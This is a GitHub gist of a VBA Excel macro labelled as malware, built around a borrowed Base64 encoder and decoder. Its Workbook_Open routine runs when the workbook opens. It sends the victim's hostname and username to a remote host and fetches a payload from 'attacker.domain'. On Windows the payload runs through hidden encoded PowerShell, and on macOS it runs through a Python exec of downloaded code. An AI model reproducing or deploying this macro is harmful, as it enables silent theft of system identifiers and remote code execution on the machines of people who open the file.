Created
March 29, 2017 09:37
-
-
Save anonymous/db37338ba9c59336a0ee3d324d152bc9 to your computer and use it in GitHub Desktop.
Macro malware that retrieves the OS (Windows or OSX) and executes the appropriate payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'get OS, if nt else if OS X | |
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long | |
' A Base64 Encoder/Decoder. | |
' | |
' This module is used to encode and decode data in Base64 format as described in RFC 1521. | |
' | |
' Home page: www.source-code.biz. | |
' License: GNU/LGPL (www.gnu.org/licenses/lgpl.html). | |
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland. | |
' This module is provided "as is" without warranty of any kind. | |
Option Explicit | |
Private InitDone As Boolean | |
Private Map1(0 To 63) As Byte | |
Private Map2(0 To 127) As Byte | |
' Encodes a string into Base64 format. | |
' No blanks or line breaks are inserted. | |
' Parameters: | |
' S a String to be encoded. | |
' Returns: a String with the Base64 encoded data. | |
Public Function Base64EncodeString(ByVal s As String) As String | |
Base64EncodeString = Base64Encode(ConvertStringToBytes(s)) | |
End Function | |
' Encodes a byte array into Base64 format. | |
' No blanks or line breaks are inserted. | |
' Parameters: | |
' InData an array containing the data bytes to be encoded. | |
' Returns: a string with the Base64 encoded data. | |
Public Function Base64Encode(InData() As Byte) | |
Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1) | |
End Function | |
' Encodes a byte array into Base64 format. | |
' No blanks or line breaks are inserted. | |
' Parameters: | |
' InData an array containing the data bytes to be encoded. | |
' InLen number of bytes to process in InData. | |
' Returns: a string with the Base64 encoded data. | |
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String | |
If Not InitDone Then Init | |
If InLen = 0 Then Base64Encode2 = "": Exit Function | |
Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3 ' output length without padding | |
Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4 ' output length including padding | |
Dim Out() As Byte | |
ReDim Out(0 To OLen - 1) As Byte | |
Dim ip0 As Long: ip0 = LBound(InData) | |
Dim ip As Long | |
Dim op As Long | |
Do While ip < InLen | |
Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1 | |
Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0 | |
Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0 | |
Dim o0 As Byte: o0 = i0 \ 4 | |
Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10) | |
Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40) | |
Dim o3 As Byte: o3 = i2 And &H3F | |
Out(op) = Map1(o0): op = op + 1 | |
Out(op) = Map1(o1): op = op + 1 | |
Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1 | |
Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1 | |
Loop | |
Base64Encode2 = ConvertBytesToString(Out) | |
End Function | |
' Decodes a string from Base64 format. | |
' Parameters: | |
' s a Base64 String to be decoded. | |
' Returns a String containing the decoded data. | |
Public Function Base64DecodeString(ByVal s As String) As String | |
If s = "" Then Base64DecodeString = "": Exit Function | |
Base64DecodeString = ConvertBytesToString(Base64Decode(s)) | |
End Function | |
' Decodes a byte array from Base64 format. | |
' Parameters | |
' s a Base64 String to be decoded. | |
' Returns: an array containing the decoded data bytes. | |
Public Function Base64Decode(ByVal s As String) As Byte() | |
If Not InitDone Then Init | |
Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s) | |
Dim ILen As Long: ILen = UBound(IBuf) + 1 | |
If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4." | |
Do While ILen > 0 | |
If IBuf(ILen - 1) <> Asc("=") Then Exit Do | |
ILen = ILen - 1 | |
Loop | |
Dim OLen As Long: OLen = (ILen * 3) \ 4 | |
Dim Out() As Byte | |
ReDim Out(0 To OLen - 1) As Byte | |
Dim ip As Long | |
Dim op As Long | |
Do While ip < ILen | |
Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1 | |
Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1 | |
Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A") | |
Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A") | |
If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _ | |
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data." | |
Dim b0 As Byte: b0 = Map2(i0) | |
Dim b1 As Byte: b1 = Map2(i1) | |
Dim b2 As Byte: b2 = Map2(i2) | |
Dim b3 As Byte: b3 = Map2(i3) | |
If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _ | |
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data." | |
Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10) | |
Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4) | |
Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3 | |
Out(op) = o0: op = op + 1 | |
If op < OLen Then Out(op) = o1: op = op + 1 | |
If op < OLen Then Out(op) = o2: op = op + 1 | |
Loop | |
Base64Decode = Out | |
End Function | |
Private Sub Init() | |
Dim C As Integer, i As Integer | |
' set Map1 | |
i = 0 | |
For C = Asc("A") To Asc("Z"): Map1(i) = C: i = i + 1: Next | |
For C = Asc("a") To Asc("z"): Map1(i) = C: i = i + 1: Next | |
For C = Asc("0") To Asc("9"): Map1(i) = C: i = i + 1: Next | |
Map1(i) = Asc("+"): i = i + 1 | |
Map1(i) = Asc("/"): i = i + 1 | |
' set Map2 | |
For i = 0 To 127: Map2(i) = 255: Next | |
For i = 0 To 63: Map2(Map1(i)) = i: Next | |
InitDone = True | |
End Sub | |
Private Function ConvertStringToBytes(ByVal s As String) As Byte() | |
Dim b1() As Byte: b1 = s | |
Dim l As Long: l = (UBound(b1) + 1) \ 2 | |
If l = 0 Then ConvertStringToBytes = b1: Exit Function | |
Dim b2() As Byte | |
ReDim b2(0 To l - 1) As Byte | |
Dim p As Long | |
For p = 0 To l - 1 | |
Dim C As Long: C = b1(2 * p) + 256 * CLng(b1(2 * p + 1)) | |
If C >= 256 Then C = Asc("?") | |
b2(p) = C | |
Next | |
ConvertStringToBytes = b2 | |
End Function | |
Private Function ConvertBytesToString(b() As Byte) As String | |
Dim l As Long: l = UBound(b) - LBound(b) + 1 | |
Dim b2() As Byte | |
ReDim b2(0 To (2 * l) - 1) As Byte | |
Dim p0 As Long: p0 = LBound(b) | |
Dim p As Long | |
For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next | |
Dim s As String: s = b2 | |
ConvertBytesToString = s | |
End Function | |
Function GetHTTPResult(sURL As String) As String | |
Dim XMLHTTP As Variant, sResult As String | |
Set XMLHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") | |
XMLHTTP.Open "GET", sURL, False | |
XMLHTTP.Send | |
Debug.Print "Status: " & XMLHTTP.Status & " - " & XMLHTTP.StatusText | |
sResult = XMLHTTP.ResponseText | |
Debug.Print "Length of response: " & Len(sResult) | |
Set XMLHTTP = Nothing | |
GetHTTPResult = sResult | |
End Function | |
Private Sub Workbook_Open() | |
Dim result As String | |
Dim position As Integer | |
Dim hostname As String | |
Dim username As String | |
Dim etc_host As String | |
Dim text As String | |
Dim aLine As String | |
Dim aURL As String | |
Dim uResult As String | |
Dim encoded As String | |
Dim FileNum As Integer | |
Dim aFile As String | |
Dim command As String | |
Dim exec_string As String | |
result = Application.OperatingSystem | |
position = InStr(result, "Macintosh") | |
If position = 0 Then | |
' Using windows' | |
'MsgBox "Microsoft Excel is using Windows " & position | |
hostname = Environ$("computername") | |
username = Environ$("username") | |
'MsgBox "test: " & hostname & " " & username | |
Dim sURL As String, sResult As String | |
Dim oResult As Variant, oData As Variant, R As Long, C As Long | |
text = hostname & " " & username | |
encoded = Base64EncodeString(text) | |
sURL = "http://XX.XX.XX.XX:80/" & encoded | |
'MsgBox "URL: " & sURL | |
sResult = GetHTTPResult(sURL) | |
sResult = GetHTTPResult("http://attacker.domain/payload_windows") | |
'Debug.Print sResult | |
command = "powershell.exe -NoP -sta -NonI -W Hidden -Enc " & sResult | |
'Debug.Print command | |
result = Shell(command) | |
Else | |
aURL = "http://attacker.domain/" | |
result = system("/usr/bin/python -c 'import socket,os,base64,urllib2;urllib2.urlopen(" & Chr(34) & aURL & Chr(34) & " + base64.b64encode(socket.gethostname() + " & Chr(34) & " " & Chr(34) & " + os.environ[" & Chr(34) & "USER" & Chr(34) & "]))'") | |
Debug.Print result | |
result = system("/usr/bin/python -c 'import socket,os,base64,urllib2;exec(urllib2.urlopen(" & Chr(34) & "http://attacker.domain/payload_osx" & Chr(34) & ").read())' &") | |
End If | |
End Sub | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment